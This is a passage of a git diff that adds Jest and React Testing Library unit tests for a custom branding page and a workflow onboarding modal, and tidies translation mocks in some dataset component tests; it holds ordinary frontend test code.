++++++++++++++++++ .../start-node-option.spec.tsx | 348 +++++++++ .../start-node-selection-panel.spec.tsx | 586 +++++++++++++++ 7 files changed, 2121 insertions(+), 15 deletions(-) create mode 100644 web/app/components/custom/custom-page/index.spec.tsx create mode 100644 web/app/components/workflow-app/components/workflow-onboarding-modal/index.spec.tsx create mode 100644 web/app/components/workflow-app/components/workflow-onboarding-modal/start-node-option.spec.tsx create mode 100644 web/app/components/workflow-app/components/workflow-onboarding-modal/start-node-selection-panel.spec.tsx diff --git a/web/app/components/custom/custom-page/index.spec.tsx b/web/app/components/custom/custom-page/index.spec.tsx new file mode 100644 index 0000000000..f260236587 --- /dev/null +++ b/web/app/components/custom/custom-page/index.spec.tsx @@ -0,0 +1,500 @@ +import React from 'react' +import { render, screen } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import CustomPage from './index' +import { Plan } from '@/app/components/billing/type' +import { createMockProviderContextValue } from '@/__mocks__/provider-context' +import { contactSalesUrl } from '@/app/components/billing/config' + +// Mock external dependencies only +jest.mock('@/context/provider-context', () => ({ + useProviderContext: jest.fn(), +})) + +jest.mock('@/context/modal-context', () => ({ + useModalContext: jest.fn(), +})) + +// Mock the complex CustomWebAppBrand component to avoid dependency issues +// This is acceptable because it has complex dependencies (fetch, APIs) +jest.mock('../custom-web-app-brand', () => ({ + __esModule: true, + default: () =>
CustomWebAppBrand
, +})) + +// Get the mocked functions +const { useProviderContext } = jest.requireMock('@/context/provider-context') +const { useModalContext } = jest.requireMock('@/context/modal-context') + +describe('CustomPage', () => { + const mockSetShowPricingModal = jest.fn() + + beforeEach(() => { + jest.clearAllMocks() + + // Default mock setup + useModalContext.mockReturnValue({ + setShowPricingModal: mockSetShowPricingModal, + }) + }) + + // Helper function to render with different provider contexts + const renderWithContext = (overrides = {}) => { + useProviderContext.mockReturnValue( + createMockProviderContextValue(overrides), + ) + return render() + } + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render without crashing', () => { + // Arrange & Act + renderWithContext() + + // Assert + expect(screen.getByTestId('custom-web-app-brand')).toBeInTheDocument() + }) + + it('should always render CustomWebAppBrand component', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.sandbox }, + }) + + // Assert + expect(screen.getByTestId('custom-web-app-brand')).toBeInTheDocument() + }) + + it('should have correct layout structure', () => { + // Arrange & Act + const { container } = renderWithContext() + + // Assert + const mainContainer = container.querySelector('.flex.flex-col') + expect(mainContainer).toBeInTheDocument() + }) + }) + + // Conditional Rendering - Billing Tip + describe('Billing Tip Banner', () => { + it('should show billing tip when enableBilling is true and plan is sandbox', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.sandbox }, + }) + + // Assert + expect(screen.getByText('custom.upgradeTip.title')).toBeInTheDocument() + expect(screen.getByText('custom.upgradeTip.des')).toBeInTheDocument() + expect(screen.getByText('billing.upgradeBtn.encourageShort')).toBeInTheDocument() + }) + + it('should not show billing tip when enableBilling is false', () => { + // Arrange & Act + renderWithContext({ + enableBilling: false, + plan: { type: Plan.sandbox }, + }) + + // Assert + expect(screen.queryByText('custom.upgradeTip.title')).not.toBeInTheDocument() + expect(screen.queryByText('custom.upgradeTip.des')).not.toBeInTheDocument() + }) + + it('should not show billing tip when plan is professional', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.professional }, + }) + + // Assert + expect(screen.queryByText('custom.upgradeTip.title')).not.toBeInTheDocument() + expect(screen.queryByText('custom.upgradeTip.des')).not.toBeInTheDocument() + }) + + it('should not show billing tip when plan is team', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.team }, + }) + + // Assert + expect(screen.queryByText('custom.upgradeTip.title')).not.toBeInTheDocument() + expect(screen.queryByText('custom.upgradeTip.des')).not.toBeInTheDocument() + }) + + it('should have correct gradient styling for billing tip banner', () => { + // Arrange & Act + const { container } = renderWithContext({ + enableBilling: true, + plan: { type: Plan.sandbox }, + }) + + // Assert + const banner = container.querySelector('.bg-gradient-to-r') + expect(banner).toBeInTheDocument() + expect(banner).toHaveClass('from-components-input-border-active-prompt-1') + expect(banner).toHaveClass('to-components-input-border-active-prompt-2') + expect(banner).toHaveClass('p-4') + expect(banner).toHaveClass('pl-6') + expect(banner).toHaveClass('shadow-lg') + }) + }) + + // Conditional Rendering - Contact Sales + describe('Contact Sales Section', () => { + it('should show contact section when enableBilling is true and plan is professional', () => { + // Arrange & Act + const { container } = renderWithContext({ + enableBilling: true, + plan: { type: Plan.professional }, + }) + + // Assert - Check that contact section exists with all parts + const contactSection = container.querySelector('.absolute.bottom-0') + expect(contactSection).toBeInTheDocument() + expect(contactSection).toHaveTextContent('custom.customize.prefix') + expect(screen.getByText('custom.customize.contactUs')).toBeInTheDocument() + expect(contactSection).toHaveTextContent('custom.customize.suffix') + }) + + it('should show contact section when enableBilling is true and plan is team', () => { + // Arrange & Act + const { container } = renderWithContext({ + enableBilling: true, + plan: { type: Plan.team }, + }) + + // Assert - Check that contact section exists with all parts + const contactSection = container.querySelector('.absolute.bottom-0') + expect(contactSection).toBeInTheDocument() + expect(contactSection).toHaveTextContent('custom.customize.prefix') + expect(screen.getByText('custom.customize.contactUs')).toBeInTheDocument() + expect(contactSection).toHaveTextContent('custom.customize.suffix') + }) + + it('should not show contact section when enableBilling is false', () => { + // Arrange & Act + renderWithContext({ + enableBilling: false, + plan: { type: Plan.professional }, + }) + + // Assert + expect(screen.queryByText('custom.customize.prefix')).not.toBeInTheDocument() + expect(screen.queryByText('custom.customize.contactUs')).not.toBeInTheDocument() + }) + + it('should not show contact section when plan is sandbox', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.sandbox }, + }) + + // Assert + expect(screen.queryByText('custom.customize.prefix')).not.toBeInTheDocument() + expect(screen.queryByText('custom.customize.contactUs')).not.toBeInTheDocument() + }) + + it('should render contact link with correct URL', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.professional }, + }) + + // Assert + const link = screen.getByText('custom.customize.contactUs').closest('a') + expect(link).toHaveAttribute('href', contactSalesUrl) + expect(link).toHaveAttribute('target', '_blank') + expect(link).toHaveAttribute('rel', 'noopener noreferrer') + }) + + it('should have correct positioning for contact section', () => { + // Arrange & Act + const { container } = renderWithContext({ + enableBilling: true, + plan: { type: Plan.professional }, + }) + + // Assert + const contactSection = container.querySelector('.absolute.bottom-0') + expect(contactSection).toBeInTheDocument() + expect(contactSection).toHaveClass('h-[50px]') + expect(contactSection).toHaveClass('text-xs') + expect(contactSection).toHaveClass('leading-[50px]') + }) + }) + + // User Interactions + describe('User Interactions', () => { + it('should call setShowPricingModal when upgrade button is clicked', async () => { + // Arrange + const user = userEvent.setup() + renderWithContext({ + enableBilling: true, + plan: { type: Plan.sandbox }, + }) + + // Act + const upgradeButton = screen.getByText('billing.upgradeBtn.encourageShort') + await user.click(upgradeButton) + + // Assert + expect(mockSetShowPricingModal).toHaveBeenCalledTimes(1) + }) + + it('should call setShowPricingModal without arguments', async () => { + // Arrange + const user = userEvent.setup() + renderWithContext({ + enableBilling: true, + plan: { type: Plan.sandbox }, + }) + + // Act + const upgradeButton = screen.getByText('billing.upgradeBtn.encourageShort') + await user.click(upgradeButton) + + // Assert + expect(mockSetShowPricingModal).toHaveBeenCalledWith() + }) + + it('should handle multiple clicks on upgrade button', async () => { + // Arrange + const user = userEvent.setup() + renderWithContext({ + enableBilling: true, + plan: { type: Plan.sandbox }, + }) + + // Act + const upgradeButton = screen.getByText('billing.upgradeBtn.encourageShort') + await user.click(upgradeButton) + await user.click(upgradeButton) + await user.click(upgradeButton) + + // Assert + expect(mockSetShowPricingModal).toHaveBeenCalledTimes(3) + }) + + it('should have correct button styling for upgrade button', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.sandbox }, + }) + + // Assert + const upgradeButton = screen.getByText('billing.upgradeBtn.encourageShort') + expect(upgradeButton).toHaveClass('cursor-pointer') + expect(upgradeButton).toHaveClass('bg-white') + expect(upgradeButton).toHaveClass('text-text-accent') + expect(upgradeButton).toHaveClass('rounded-3xl') + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle undefined plan type gracefully', () => { + // Arrange & Act + expect(() => { + renderWithContext({ + enableBilling: true, + plan: { type: undefined }, + }) + }).not.toThrow() + + // Assert + expect(screen.getByTestId('custom-web-app-brand')).toBeInTheDocument() + }) + + it('should handle plan without type property', () => { + // Arrange & Act + expect(() => { + renderWithContext({ + enableBilling: true, + plan: { type: null }, + }) + }).not.toThrow() + + // Assert + expect(screen.getByTestId('custom-web-app-brand')).toBeInTheDocument() + }) + + it('should not show any banners when both conditions are false', () => { + // Arrange & Act + renderWithContext({ + enableBilling: false, + plan: { type: Plan.sandbox }, + }) + + // Assert + expect(screen.queryByText('custom.upgradeTip.title')).not.toBeInTheDocument() + expect(screen.queryByText('custom.customize.prefix')).not.toBeInTheDocument() + }) + + it('should handle enableBilling undefined', () => { + // Arrange & Act + expect(() => { + renderWithContext({ + enableBilling: undefined, + plan: { type: Plan.sandbox }, + }) + }).not.toThrow() + + // Assert + expect(screen.queryByText('custom.upgradeTip.title')).not.toBeInTheDocument() + }) + + it('should show only billing tip for sandbox plan, not contact section', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.sandbox }, + }) + + // Assert + expect(screen.getByText('custom.upgradeTip.title')).toBeInTheDocument() + expect(screen.queryByText('custom.customize.contactUs')).not.toBeInTheDocument() + }) + + it('should show only contact section for professional plan, not billing tip', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.professional }, + }) + + // Assert + expect(screen.queryByText('custom.upgradeTip.title')).not.toBeInTheDocument() + expect(screen.getByText('custom.customize.contactUs')).toBeInTheDocument() + }) + + it('should show only contact section for team plan, not billing tip', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.team }, + }) + + // Assert + expect(screen.queryByText('custom.upgradeTip.title')).not.toBeInTheDocument() + expect(screen.getByText('custom.customize.contactUs')).toBeInTheDocument() + }) + + it('should handle empty plan object', () => { + // Arrange & Act + expect(() => { + renderWithContext({ + enableBilling: true, + plan: {}, + }) + }).not.toThrow() + + // Assert + expect(screen.getByTestId('custom-web-app-brand')).toBeInTheDocument() + }) + }) + + // Accessibility Tests + describe('Accessibility', () => { + it('should have clickable upgrade button', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.sandbox }, + }) + + // Assert + const upgradeButton = screen.getByText('billing.upgradeBtn.encourageShort') + expect(upgradeButton).toBeInTheDocument() + expect(upgradeButton).toHaveClass('cursor-pointer') + }) + + it('should have proper external link attributes on contact link', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.professional }, + }) + + // Assert + const link = screen.getByText('custom.customize.contactUs').closest('a') + expect(link).toHaveAttribute('rel', 'noopener noreferrer') + expect(link).toHaveAttribute('target', '_blank') + }) + + it('should have proper text hierarchy in billing tip', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.sandbox }, + }) + + // Assert + const title = screen.getByText('custom.upgradeTip.title') + const description = screen.getByText('custom.upgradeTip.des') + + expect(title).toHaveClass('title-xl-semi-bold') + expect(description).toHaveClass('system-sm-regular') + }) + + it('should use semantic color classes', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.sandbox }, + }) + + // Assert - Check that the billing tip has text content (which implies semantic colors) + expect(screen.getByText('custom.upgradeTip.title')).toBeInTheDocument() + }) + }) + + // Integration Tests + describe('Integration', () => { + it('should render both CustomWebAppBrand and billing tip together', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.sandbox }, + }) + + // Assert + expect(screen.getByTestId('custom-web-app-brand')).toBeInTheDocument() + expect(screen.getByText('custom.upgradeTip.title')).toBeInTheDocument() + }) + + it('should render both CustomWebAppBrand and contact section together', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.professional }, + }) + + // Assert + expect(screen.getByTestId('custom-web-app-brand')).toBeInTheDocument() + expect(screen.getByText('custom.customize.contactUs')).toBeInTheDocument() + }) + + it('should render only CustomWebAppBrand when no billing conditions met', () => { + // Arrange & Act + renderWithContext({ + enableBilling: false, + plan: { type: Plan.sandbox }, + }) + + // Assert + expect(screen.getByTestId('custom-web-app-brand')).toBeInTheDocument() + expect(screen.queryByText('custom.upgradeTip.title')).not.toBeInTheDocument() + expect(screen.queryByText('custom.customize.contactUs')).not.toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/datasets/common/document-picker/index.spec.tsx b/web/app/components/datasets/common/document-picker/index.spec.tsx index 3caa3d655b..0ce4d8afa5 100644 --- a/web/app/components/datasets/common/document-picker/index.spec.tsx +++ b/web/app/components/datasets/common/document-picker/index.spec.tsx @@ -5,13 +5,6 @@ import type { ParentMode, SimpleDocumentDetail } from '@/models/datasets' import { ChunkingMode, DataSourceType } from '@/models/datasets' import DocumentPicker from './index' -// Mock react-i18next -jest.mock('react-i18next', () => ({ - useTranslation: () => ({ - t: (key: string) => key, - }), -})) - // Mock portal-to-follow-elem - always render content for testing jest.mock('@/app/components/base/portal-to-follow-elem', () => ({ PortalToFollowElem: ({ children, open }: { diff --git a/web/app/components/datasets/common/document-picker/preview-document-picker.spec.tsx b/web/app/components/datasets/common/document-picker/preview-document-picker.spec.tsx index e6900d23db..737ef8b6dc 100644 --- a/web/app/components/datasets/common/document-picker/preview-document-picker.spec.tsx +++ b/web/app/components/datasets/common/document-picker/preview-document-picker.spec.tsx @@ -3,7 +3,7 @@ import { fireEvent, render, screen } from '@testing-library/react' import type { DocumentItem } from '@/models/datasets' import PreviewDocumentPicker from './preview-document-picker' -// Mock react-i18next +// Override shared i18n mock for custom translations jest.mock('react-i18next', () => ({ useTranslation: () => ({ t: (key: string, params?: Record) => { diff --git a/web/app/components/datasets/common/retrieval-method-config/index.spec.tsx b/web/app/components/datasets/common/retrieval-method-config/index.spec.tsx index be509f1c6e..7d5edb3dbb 100644 --- a/web/app/components/datasets/common/retrieval-method-config/index.spec.tsx +++ b/web/app/components/datasets/common/retrieval-method-config/index.spec.tsx @@ -9,13 +9,6 @@ import { } from '@/models/datasets' import RetrievalMethodConfig from './index' -// Mock react-i18next -jest.mock('react-i18next', () => ({ - useTranslation: () => ({ - t: (key: string) => key, - }), -})) - // Mock provider context with controllable supportRetrievalMethods let mockSupportRetrievalMethods: RETRIEVE_METHOD[] = [ RETRIEVE_METHOD.semantic, diff --git a/web/app/components/workflow-app/components/workflow-onboarding-modal/index.spec.tsx b/web/app/components/workflow-app/components/workflow-onboarding-modal/index.spec.tsx new file mode 100644 index 0000000000..81d7dc8af6 --- /dev/null +++ b/web/app/components/workflow-app/components/workflow-onboarding-modal/index.spec.tsx @@ -0,0 +1,686 @@ +import React from 'react' +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import WorkflowOnboardingModal from './index' +import { BlockEnum } from '@/app/components/workflow/types' + +// Mock Modal component +jest.mock('@/app/components/base/modal', () => { + return function MockModal({ + isShow, + onClose, + children, + closable, + }: any) { + if (!isShow) + return null + + return ( +
+ {closable && ( + + )} + {children} +
+ ) + } +}) + +// Mock useDocLink hook +jest.mock('@/context/i18n', () => ({ + useDocLink: () => (path: string) => `https://docs.example.com${path}`, +})) + +// Mock StartNodeSelectionPanel (using real component would be better for integration, +// but for this test we'll mock to control behavior) +jest.mock('./start-node-selection-panel', () => { + return function MockStartNodeSelectionPanel({ + onSelectUserInput, + onSelectTrigger, + }: any) { + return ( +
+ + + +
+ ) + } +}) + +describe('WorkflowOnboardingModal', () => { + const mockOnClose = jest.fn() + const mockOnSelectStartNode = jest.fn() + + const defaultProps = { + isShow: true, + onClose: mockOnClose, + onSelectStartNode: mockOnSelectStartNode, + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + // Helper function to render component + const renderComponent = (props = {}) => { + return render() + } + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render without crashing', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByRole('dialog')).toBeInTheDocument() + }) + + it('should render modal when isShow is true', () => { + // Arrange & Act + renderComponent({ isShow: true }) + + // Assert + expect(screen.getByTestId('modal')).toBeInTheDocument() + }) + + it('should not render modal when isShow is false', () => { + // Arrange & Act + renderComponent({ isShow: false }) + + // Assert + expect(screen.queryByTestId('modal')).not.toBeInTheDocument() + }) + + it('should render modal title', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByText('workflow.onboarding.title')).toBeInTheDocument() + }) + + it('should render modal description', () => { + // Arrange & Act + const { container } = renderComponent() + + // Assert - Check both parts of description (separated by link) + const descriptionDiv = container.querySelector('.body-xs-regular.leading-4') + expect(descriptionDiv).toBeInTheDocument() + expect(descriptionDiv).toHaveTextContent('workflow.onboarding.description') + expect(descriptionDiv).toHaveTextContent('workflow.onboarding.aboutStartNode') + }) + + it('should render learn more link', () => { + // Arrange & Act + renderComponent() + + // Assert + const learnMoreLink = screen.getByText('workflow.onboarding.learnMore') + expect(learnMoreLink).toBeInTheDocument() + expect(learnMoreLink.closest('a')).toHaveAttribute('href', 'https://docs.example.com/guides/workflow/node/start') + expect(learnMoreLink.closest('a')).toHaveAttribute('target', '_blank') + expect(learnMoreLink.closest('a')).toHaveAttribute('rel', 'noopener noreferrer') + }) + + it('should render StartNodeSelectionPanel', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByTestId('start-node-selection-panel')).toBeInTheDocument() + }) + + it('should render ESC tip when modal is shown', () => { + // Arrange & Act + renderComponent({ isShow: true }) + + // Assert + expect(screen.getByText('workflow.onboarding.escTip.press')).toBeInTheDocument() + expect(screen.getByText('workflow.onboarding.escTip.key')).toBeInTheDocument() + expect(screen.getByText('workflow.onboarding.escTip.toDismiss')).toBeInTheDocument() + }) + + it('should not render ESC tip when modal is hidden', () => { + // Arrange & Act + renderComponent({ isShow: false }) + + // Assert + expect(screen.queryByText('workflow.onboarding.escTip.press')).not.toBeInTheDocument() + }) + + it('should have correct styling for title', () => { + // Arrange & Act + renderComponent() + + // Assert + const title = screen.getByText('workflow.onboarding.title') + expect(title).toHaveClass('title-2xl-semi-bold') + expect(title).toHaveClass('text-text-primary') + }) + + it('should have modal close button', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByTestId('modal-close-button')).toBeInTheDocument() + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should accept isShow prop', () => { + // Arrange & Act + const { rerender } = renderComponent({ isShow: false }) + + // Assert + expect(screen.queryByTestId('modal')).not.toBeInTheDocument() + + // Act + rerender() + + // Assert + expect(screen.getByTestId('modal')).toBeInTheDocument() + }) + + it('should accept onClose prop', () => { + // Arrange + const customOnClose = jest.fn() + + // Act + renderComponent({ onClose: customOnClose }) + + // Assert + expect(screen.getByTestId('modal')).toBeInTheDocument() + }) + + it('should accept onSelectStartNode prop', () => { + // Arrange + const customHandler = jest.fn() + + // Act + renderComponent({ onSelectStartNode: customHandler }) + + // Assert + expect(screen.getByTestId('start-node-selection-panel')).toBeInTheDocument() + }) + + it('should handle undefined onClose gracefully', () => { + // Arrange & Act + expect(() => { + renderComponent({ onClose: undefined }) + }).not.toThrow() + + // Assert + expect(screen.getByTestId('modal')).toBeInTheDocument() + }) + + it('should handle undefined onSelectStartNode gracefully', () => { + // Arrange & Act + expect(() => { + renderComponent({ onSelectStartNode: undefined }) + }).not.toThrow() + + // Assert + expect(screen.getByTestId('modal')).toBeInTheDocument() + }) + }) + + // User Interactions - Start Node Selection + describe('User Interactions - Start Node Selection', () => { + it('should call onSelectStartNode with Start block when user input is selected', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const userInputButton = screen.getByTestId('select-user-input') + await user.click(userInputButton) + + // Assert + expect(mockOnSelectStartNode).toHaveBeenCalledTimes(1) + expect(mockOnSelectStartNode).toHaveBeenCalledWith(BlockEnum.Start) + }) + + it('should call onClose after selecting user input', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const userInputButton = screen.getByTestId('select-user-input') + await user.click(userInputButton) + + // Assert + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + + it('should call onSelectStartNode with trigger type when trigger is selected', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const triggerButton = screen.getByTestId('select-trigger-schedule') + await user.click(triggerButton) + + // Assert + expect(mockOnSelectStartNode).toHaveBeenCalledTimes(1) + expect(mockOnSelectStartNode).toHaveBeenCalledWith(BlockEnum.TriggerSchedule, undefined) + }) + + it('should call onClose after selecting trigger', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const triggerButton = screen.getByTestId('select-trigger-schedule') + await user.click(triggerButton) + + // Assert + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + + it('should pass tool config when selecting trigger with config', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const webhookButton = screen.getByTestId('select-trigger-webhook') + await user.click(webhookButton) + + // Assert + expect(mockOnSelectStartNode).toHaveBeenCalledTimes(1) + expect(mockOnSelectStartNode).toHaveBeenCalledWith(BlockEnum.TriggerWebhook, { config: 'test' }) + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + }) + + // User Interactions - Modal Close + describe('User Interactions - Modal Close', () => { + it('should call onClose when close button is clicked', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const closeButton = screen.getByTestId('modal-close-button') + await user.click(closeButton) + + // Assert + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + + it('should not call onSelectStartNode when closing without selection', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const closeButton = screen.getByTestId('modal-close-button') + await user.click(closeButton) + + // Assert + expect(mockOnSelectStartNode).not.toHaveBeenCalled() + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + }) + + // Keyboard Event Handling + describe('Keyboard Event Handling', () => { + it('should call onClose when ESC key is pressed', () => { + // Arrange + renderComponent({ isShow: true }) + + // Act + fireEvent.keyDown(document, { key: 'Escape', code: 'Escape' }) + + // Assert + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + + it('should not call onClose when other keys are pressed', () => { + // Arrange + renderComponent({ isShow: true }) + + // Act + fireEvent.keyDown(document, { key: 'Enter', code: 'Enter' }) + fireEvent.keyDown(document, { key: 'Tab', code: 'Tab' }) + fireEvent.keyDown(document, { key: 'a', code: 'KeyA' }) + + // Assert + expect(mockOnClose).not.toHaveBeenCalled() + }) + + it('should not call onClose when ESC is pressed but modal is hidden', () => { + // Arrange + renderComponent({ isShow: false }) + + // Act + fireEvent.keyDown(document, { key: 'Escape', code: 'Escape' }) + + // Assert + expect(mockOnClose).not.toHaveBeenCalled() + }) + + it('should clean up event listener on unmount', () => { + // Arrange + const { unmount } = renderComponent({ isShow: true }) + + // Act + unmount() + fireEvent.keyDown(document, { key: 'Escape', code: 'Escape' }) + + // Assert + expect(mockOnClose).not.toHaveBeenCalled() + }) + + it('should update event listener when isShow changes', () => { + // Arrange + const { rerender } = renderComponent({ isShow: true }) + + // Act - Press ESC when shown + fireEvent.keyDown(document, { key: 'Escape', code: 'Escape' }) + + // Assert + expect(mockOnClose).toHaveBeenCalledTimes(1) + + // Act - Hide modal and clear mock + mockOnClose.mockClear() + rerender() + + // Act - Press ESC when hidden + fireEvent.keyDown(document, { key: 'Escape', code: 'Escape' }) + + // Assert + expect(mockOnClose).not.toHaveBeenCalled() + }) + + it('should handle multiple ESC key presses', () => { + // Arrange + renderComponent({ isShow: true }) + + // Act + fireEvent.keyDown(document, { key: 'Escape', code: 'Escape' }) + fireEvent.keyDown(document, { key: 'Escape', code: 'Escape' }) + fireEvent.keyDown(document, { key: 'Escape', code: 'Escape' }) + + // Assert + expect(mockOnClose).toHaveBeenCalledTimes(3) + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle rapid modal show/hide toggling', async () => { + // Arrange + const { rerender } = renderComponent({ isShow: false }) + + // Assert + expect(screen.queryByTestId('modal')).not.toBeInTheDocument() + + // Act + rerender() + + // Assert + expect(screen.getByTestId('modal')).toBeInTheDocument() + + // Act + rerender() + + // Assert + await waitFor(() => { + expect(screen.queryByTestId('modal')).not.toBeInTheDocument() + }) + }) + + it('should handle selecting multiple nodes in sequence', async () => { + // Arrange + const user = userEvent.setup() + const { rerender } = renderComponent() + + // Act - Select user input + await user.click(screen.getByTestId('select-user-input')) + + // Assert + expect(mockOnSelectStartNode).toHaveBeenCalledWith(BlockEnum.Start) + expect(mockOnClose).toHaveBeenCalledTimes(1) + + // Act - Re-show modal and select trigger + mockOnClose.mockClear() + mockOnSelectStartNode.mockClear() + rerender() + + await user.click(screen.getByTestId('select-trigger-schedule')) + + // Assert + expect(mockOnSelectStartNode).toHaveBeenCalledWith(BlockEnum.TriggerSchedule, undefined) + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + + it('should handle prop updates correctly', () => { + // Arrange + const { rerender } = renderComponent({ isShow: true }) + + // Assert + expect(screen.getByTestId('modal')).toBeInTheDocument() + + // Act - Update props + const newOnClose = jest.fn() + const newOnSelectStartNode = jest.fn() + rerender( + , + ) + + // Assert - Modal still renders with new props + expect(screen.getByTestId('modal')).toBeInTheDocument() + }) + + it('should handle onClose being called multiple times', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + await user.click(screen.getByTestId('modal-close-button')) + await user.click(screen.getByTestId('modal-close-button')) + + // Assert + expect(mockOnClose).toHaveBeenCalledTimes(2) + }) + + it('should maintain modal state when props change', () => { + // Arrange + const { rerender } = renderComponent({ isShow: true }) + + // Assert + expect(screen.getByTestId('modal')).toBeInTheDocument() + + // Act - Change onClose handler + const newOnClose = jest.fn() + rerender() + + // Assert - Modal should still be visible + expect(screen.getByTestId('modal')).toBeInTheDocument() + }) + }) + + // Accessibility Tests + describe('Accessibility', () => { + it('should have dialog role', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByRole('dialog')).toBeInTheDocument() + }) + + it('should have proper heading hierarchy', () => { + // Arrange & Act + const { container } = renderComponent() + + // Assert + const heading = container.querySelector('h3') + expect(heading).toBeInTheDocument() + expect(heading).toHaveTextContent('workflow.onboarding.title') + }) + + it('should have external link with proper attributes', () => { + // Arrange & Act + renderComponent() + + // Assert + const link = screen.getByText('workflow.onboarding.learnMore').closest('a') + expect(link).toHaveAttribute('target', '_blank') + expect(link).toHaveAttribute('rel', 'noopener noreferrer') + }) + + it('should have keyboard navigation support via ESC key', () => { + // Arrange + renderComponent({ isShow: true }) + + // Act + fireEvent.keyDown(document, { key: 'Escape', code: 'Escape' }) + + // Assert + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + + it('should have visible ESC key hint', () => { + // Arrange & Act + renderComponent({ isShow: true }) + + // Assert + const escKey = screen.getByText('workflow.onboarding.escTip.key') + expect(escKey.closest('kbd')).toBeInTheDocument() + expect(escKey.closest('kbd')).toHaveClass('system-kbd') + }) + + it('should have descriptive text for ESC functionality', () => { + // Arrange & Act + renderComponent({ isShow: true }) + + // Assert + expect(screen.getByText('workflow.onboarding.escTip.press')).toBeInTheDocument() + expect(screen.getByText('workflow.onboarding.escTip.toDismiss')).toBeInTheDocument() + }) + + it('should have proper text color classes', () => { + // Arrange & Act + renderComponent() + + // Assert + const title = screen.getByText('workflow.onboarding.title') + expect(title).toHaveClass('text-text-primary') + }) + + it('should have underlined learn more link', () => { + // Arrange & Act + renderComponent() + + // Assert + const link = screen.getByText('workflow.onboarding.learnMore').closest('a') + expect(link).toHaveClass('underline') + expect(link).toHaveClass('cursor-pointer') + }) + }) + + // Integration Tests + describe('Integration', () => { + it('should complete full flow of selecting user input node', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Assert - Initial state + expect(screen.getByTestId('modal')).toBeInTheDocument() + expect(screen.getByText('workflow.onboarding.title')).toBeInTheDocument() + expect(screen.getByTestId('start-node-selection-panel')).toBeInTheDocument() + + // Act - Select user input + await user.click(screen.getByTestId('select-user-input')) + + // Assert - Callbacks called + expect(mockOnSelectStartNode).toHaveBeenCalledWith(BlockEnum.Start) + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + + it('should complete full flow of selecting trigger node', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Assert - Initial state + expect(screen.getByTestId('modal')).toBeInTheDocument() + + // Act - Select trigger + await user.click(screen.getByTestId('select-trigger-webhook')) + + // Assert - Callbacks called with config + expect(mockOnSelectStartNode).toHaveBeenCalledWith(BlockEnum.TriggerWebhook, { config: 'test' }) + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + + it('should render all components in correct hierarchy', () => { + // Arrange & Act + const { container } = renderComponent() + + // Assert - Modal is the root + expect(screen.getByTestId('modal')).toBeInTheDocument() + + // Assert - Header elements + const heading = container.querySelector('h3') + expect(heading).toBeInTheDocument() + + // Assert - Description with link + expect(screen.getByText('workflow.onboarding.learnMore').closest('a')).toBeInTheDocument() + + // Assert - Selection panel + expect(screen.getByTestId('start-node-selection-panel')).toBeInTheDocument() + + // Assert - ESC tip + expect(screen.getByText('workflow.onboarding.escTip.key')).toBeInTheDocument() + }) + + it('should coordinate between keyboard and click interactions', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act - Click close button + await user.click(screen.getByTestId('modal-close-button')) + + // Assert + expect(mockOnClose).toHaveBeenCalledTimes(1) + + // Act - Clear and try ESC key + mockOnClose.mockClear() + fireEvent.keyDown(document, { key: 'Escape', code: 'Escape' }) + + // Assert + 